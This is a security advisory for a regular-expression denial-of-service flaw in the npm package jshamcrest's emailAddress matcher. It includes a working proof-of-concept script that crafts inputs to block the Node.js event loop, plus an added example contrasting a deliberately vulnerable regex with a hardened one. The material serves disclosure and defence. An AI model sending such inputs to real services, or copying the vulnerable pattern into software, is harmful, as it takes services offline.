GHSA-xj62-87pg-vcv3
GitHub Security Advisory
Regular Expression Denial of Service in jshamcrest
Advisory Details
The `jshamcrest` package is affected by a regular expression denial of service (ReDoS) vulnerability: when attacker-controlled input is passed to the `emailAddress` matcher, the matcher's regular expression backtracks catastrophically, and the synchronous `matches()` call blocks the Node.js event loop for a time that grows rapidly with the length of the input.
## Proof of concept
```js
var js = require('jshamcrest')
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();

// Build a string of len + 1 copies of chr. The `<=` is off by one, but the
// lengths reported below depend on it, so it is kept as is.
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
}

// Grow the attack string by one character per iteration and time the matcher.
// The trailing '{' can never be part of a valid address, so every call ends
// in a failed match after the regex engine has backtracked through the run
// of 'a's. The loop bound is effectively infinite; stop it once the block
// time becomes unacceptable.
for (var i = 1; i <= 10000000; i = i + 1) {
  console.log("COUNT: " + i);
  var str = '66666666666666666666666666666@ffffffffffffffffffffffffffffffff.' + genstr(i, 'a') + '{'
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  emailAddress.matches(str)
  var end = process.hrtime(start); // [seconds, nanoseconds] spent blocked in matches()
  console.log(end);
}
```
### Results
An input of about 116 characters is enough to block the event loop for roughly 1.6 seconds on a single `matches()` call (`process.hrtime` reports `[seconds, nanoseconds]`):
```
[ 1, 633084590 ]
COUNT: 51
LENGTH: 116
```
## Timeline
- October 25, 2015 - Vulnerability Identified
- October 25, 2015 - Maintainers notified (no response)
## Recommendation
The `jshamcrest` package currently has no patched versions available.
At this time, the best available mitigation is to switch to an actively maintained alternative module that provides similar functionality; there are [multiple modules on npm that fit these criteria](https://www.npmjs.com/search?q=validator). Whichever replacement is chosen, check that its email pattern has no nested quantifiers (a group repeated by `+` or `*` that itself contains a `+`, `*` or `{m,n}` repetition) and cap the length of untrusted input before it reaches any regular expression.
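The following is an added example, not code from the advisory or from the `jshamcrest` project, that ties the proof of concept above to the recommendation: it shows why the PoC input is expensive and what a pattern without the problem looks like. The advisory does not quote the exact `emailAddress` regex, so `VULNERABLE` is a constructed stand-in with the nested-quantifier shape the PoC input exercises, and `HARDENED`, `MAX_EMAIL_LENGTH`, `attackString`, `timeMatch` and `isEmailAddress` are names chosen here, not jshamcrest's API. The 254-octet cap is the address length limit from RFC 5321.

```javascript
'use strict';

// Constructed stand-in for the vulnerable pattern (not jshamcrest's own
// regex). The final `([a-z0-9]{2,4})+$` can split a run of n letters into
// exponentially many sequences of 2-to-4 letter groups, and the engine tries
// every one of them before giving up on the `$` that the trailing '{' breaks.
const VULNERABLE = /^[a-z0-9_.+-]+@([a-z0-9-]+\.)+([a-z0-9]{2,4})+$/i;

// Constructed hardened form. Each run of label characters is consumed by a
// single unambiguous quantifier ([a-z0-9-]+ must end at a literal dot, and
// the final label is one [a-z0-9]{2,}), so there is only one way to consume
// each character and backtracking stays linear in the input length.
const HARDENED = /^[a-z0-9_.+-]+@([a-z0-9-]+\.)+[a-z0-9]{2,}$/i;

// Defence in depth: reject oversized input before any regex runs.
// 254 octets is the SMTP address length limit from RFC 5321.
const MAX_EMAIL_LENGTH = 254;

// Rebuild the PoC's input shape: a local part, a host label, a dot, a run of
// n 'a's and a '{' that guarantees the final match fails.
function attackString(n) {
  return '66666666666666666666666666666@ffffffffffffffffffffffffffffffff.' +
    'a'.repeat(n) + '{';
}

// Run one synchronous match and report how many milliseconds it blocked for.
function timeMatch(re, input) {
  const start = process.hrtime.bigint();
  const matched = re.test(input);
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  return { matched, ms };
}

// Safe validator: length cap first, then the hardened pattern.
function isEmailAddress(value) {
  if (typeof value !== 'string' || value.length > MAX_EMAIL_LENGTH) {
    return false;
  }
  return HARDENED.test(value);
}

// Show the growth: the vulnerable time roughly multiplies by a constant for
// each step in n, the hardened time stays flat. Raise n further to reproduce
// multi-second blocks like the advisory's measurement.
for (const n of [20, 26, 32, 38]) {
  const input = attackString(n);
  const v = timeMatch(VULNERABLE, input);
  const h = timeMatch(HARDENED, input);
  console.log(`n=${n} len=${input.length} vulnerable=${v.ms.toFixed(2)}ms` +
    ` hardened=${h.ms.toFixed(3)}ms (both matched=${v.matched}/${h.matched})`);
}

if (typeof module !== 'undefined') {
  module.exports = { VULNERABLE, HARDENED, MAX_EMAIL_LENGTH, attackString, timeMatch, isEmailAddress };
}
```

Run it with `node` and increase the values of `n` to see the vulnerable pattern's time climb into seconds while the hardened pattern stays in the microsecond range on the same input; the two patterns agree on ordinary addresses, and the length cap in `isEmailAddress` means a replacement regex that turns out to be slow still cannot be fed an input long enough to matter.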
Dataset
Data from GitHub Advisory Database. This information is provided for research and educational purposes.